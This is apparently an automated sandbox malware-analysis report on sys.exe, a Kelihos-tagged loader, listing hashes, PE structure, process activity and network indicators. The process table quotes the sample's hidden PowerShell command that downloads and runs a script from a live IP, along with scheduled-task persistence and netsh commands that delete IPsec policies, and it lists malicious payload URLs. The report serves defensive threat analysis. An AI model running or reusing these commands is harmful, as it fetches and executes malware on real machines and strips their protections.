analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sys.exe

Full analysis: https://app.any.run/tasks/b6355407-64a8-490b-9c5d-a2d20262a4db
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: September 25, 2020, 00:36:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
kelihos
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

956269BC45BB018F9C3599A5CF9718A6

SHA1:

A8485941EEE9DF3264130761CF91CAB8897BF5D7

SHA256:

BEB156C59A3EAAAAEA8A1BB719B916F71E530F710F68175DA13E93B94AD7E697

SSDEEP:

192:9r3UtAiucoVp65epmITVIKjUIozzDjOiM5+0gx2br/htWaf7E5pz6XVSkWMo:9r3Piucoq5eEITWKjUIYzDjm7IkWMo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1992)
      • schtasks.exe (PID: 2468)
      • schtasks.exe (PID: 3092)

    • KELIHOS was detected

      • powershell.exe (PID: 3628)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2032)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3628)

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3628)

    • Downloads executable files from IP

      • powershell.exe (PID: 3628)

    • Starts NET.EXE for service management

      • cmd.exe (PID: 2508)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3628)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 2508)

    • Uses NETSH.EXE for network configuration

      • cmd.exe (PID: 864)
      • cmd.exe (PID: 2508)
      • cmd.exe (PID: 2252)
      • cmd.exe (PID: 3036)
      • cmd.exe (PID: 2532)
      • cmd.exe (PID: 1064)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1148)
      • sys.exe (PID: 2304)
      • powershell.exe (PID: 3628)

    • Reads Internet Cache Settings

      • powershell.exe (PID: 3628)

    • Application launched itself

      • cmd.exe (PID: 1148)

    • Creates files in the user directory

      • powershell.exe (PID: 3628)

    • Creates files in the Windows directory

      • powershell.exe (PID: 3628)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

Subsystem: Windows command line
SubsystemVersion: 6
ImageVersion: -
OSVersion: 6
EntryPoint: 0x1707
UninitializedDataSize: -
InitializedDataSize: 6656
CodeSize: 4608
LinkerVersion: 14.26
PEType: PE32
TimeStamp: 2020:07:15 09:32:47+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date: 15-Jul-2020 07:32:47
Detected languages:
  • English - United States
Debug artifacts:
  • C:\Users\Administrator\source\repos\powershella\powershella\sysversion\Release\sysversion.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 15-Jul-2020 07:32:47
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000011D2
0x00001200
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.27752
.rdata
0x00003000
0x000010F6
0x00001200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.89783
.data
0x00005000
0x0000038C
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0.280401
.rsrc
0x00006000
0x000001E0
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.6976
.reloc
0x00007000
0x000001D8
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
5.94041

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.91161
381
UNKNOWN
English - United States
RT_MANIFEST

Imports

KERNEL32.dll
MSVCP140.dll
VCRUNTIME140.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
80
Monitored processes
42
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start sys.exe no specs cmd.exe no specs cmd.exe no specs #KELIHOS powershell.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs sc.exe no specs net.exe no specs net1.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2304"C:\Users\admin\AppData\Local\Temp\sys.exe" C:\Users\admin\AppData\Local\Temp\sys.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1148C:\Windows\system32\cmd.exe /c cmd.exe /c powershell -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString(('htqtp://139.5.177.32/blueps.txt' -replace 'q',''))C:\Windows\system32\cmd.exesys.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2032cmd.exe /c powershell -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString(('htqtp://139.5.177.32/blueps.txt' -replace 'q',''))C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3628powershell -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString(('htqtp://139.5.177.32/blueps.txt' -replace 'q',''))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3092"C:\Windows\system32\schtasks.exe" /run /tn okaC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1992"C:\Windows\system32\schtasks.exe" /create /tn MicrosoftsWindowsz /tr c:\windows\temp\conhoz.exe /ru system /sc minute /mo 8 /fC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2468"C:\Windows\system32\schtasks.exe" /run /tn MicrosoftsWindowszC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2508"C:\Windows\system32\cmd.exe" /c "sc config MpsSvc start= auto&net start MpsSvc&netsh ipsec static delete policy name=win&netsh ipsec static delete filterlist name=Allowlist&netsh ipsec static delete filterlist name=denylist&netsh ipsec static delete filteraction name=allow"C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1200sc config MpsSvc start= autoC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1516net start MpsSvcC:\Windows\system32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 465
Read events
323
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3628powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\67PCTSSVYE8HIZLX522N.temp
MD5:
SHA256:
3628powershell.exeC:\windows\temp\ntuser.dattext
MD5:99BBB4BF94D20A83C60A0150F85F831D
SHA256:9EC6B0655983279AB7176CF3C18997416FCA0BFE963AE24332891D9085E57276
3628powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF160479.TMPbinary
MD5:E15AFE4ED0C3F99FEB001CA3AD2065B7
SHA256:5406EE14B043B6CFDCD1848CC15D16B7CE168999909AA4AF195F9F8705436BFB
3628powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:E15AFE4ED0C3F99FEB001CA3AD2065B7
SHA256:5406EE14B043B6CFDCD1848CC15D16B7CE168999909AA4AF195F9F8705436BFB
3628powershell.exeC:\windows\temp\conhoz.exeexecutable
MD5:A4FDD182C052C420520377E94442376D
SHA256:8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
6
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3628
powershell.exe
GET
200
174.128.235.243:80
http://174.128.235.243/ntuser.rar
US
text
368 b
malicious
3628
powershell.exe
GET
200
142.54.177.106:80
http://shell.loader0807.site/TestAV.dat
US
binary
110 Kb
suspicious
3628
powershell.exe
GET
200
173.247.239.186:8186
http://173.247.239.186:8186/download.txt
US
text
459 b
malicious
3628
powershell.exe
GET
200
174.128.235.243:80
http://174.128.235.243/upsupx2.exe
US
executable
7.50 Kb
malicious
3628
powershell.exe
GET
200
139.5.177.32:80
http://139.5.177.32/blueps.txt
MY
text
2.21 Kb
malicious
3628
powershell.exe
GET
200
77.73.69.34:8034
http://77.73.69.34:8034/32.txt
RU
text
30.6 Kb
malicious
3628
powershell.exe
GET
200
77.73.69.34:80
http://77.73.69.34/Shell.txt
RU
text
35.5 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3628
powershell.exe
77.73.69.34:80
OOO Fishnet Communications
RU
malicious
3628
powershell.exe
142.54.177.106:80
shell.loader0807.site
DataShack, LC
US
suspicious
3628
powershell.exe
77.73.69.34:8034
OOO Fishnet Communications
RU
malicious
3628
powershell.exe
174.128.235.243:80
Sharktech
US
malicious
3628
powershell.exe
139.5.177.32:80
Gigabit Hosting Sdn Bhd
MY
malicious
3628
powershell.exe
173.247.239.186:8186
Corporate Colocation Inc.
US
malicious

DNS requests

Domain
IP
Reputation
shell.loader0807.site
  • 142.54.177.106
suspicious

Threats

PID
Process
Class
Message
3628
powershell.exe
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Encrypted PE EXE or DLL Windows file download
3628
powershell.exe
Potentially Bad Traffic
ET INFO Powershell Downloader with Start-Process Inbound M1
3628
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host RAR Request
3628
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3628
powershell.exe
A Network Trojan was detected
ET TROJAN Possible Kelihos.F EXE Download Common Structure
3628
powershell.exe
Misc activity
ET INFO Packed Executable Download
3628
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] VB:Trojan.Valyria
3628
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Obfuscated.SecureString
3628
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3628
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
sys.exe